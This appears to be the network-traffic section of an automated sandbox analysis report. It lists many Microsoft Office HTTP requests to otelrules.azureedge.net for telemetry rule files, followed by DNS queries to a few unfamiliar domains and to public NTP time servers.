                        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficDNS traffic detected: DNS query: www.pts.group
                        Source: global trafficDNS traffic detected: DNS query: pts.group
                        Source: global trafficDNS traffic detected: DNS query: www.fornid.com
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: global trafficDNS traffic detected: DNS query: time.facebook.com
                        Source: global trafficDNS traffic detected: DNS query: time.cloudflare.com
                        Source: global trafficDNS traffic detected: DNS query: time.google.com
                        Source: global trafficDNS traffic detected: DNS query: ntp.time.nl
                        Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                        Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
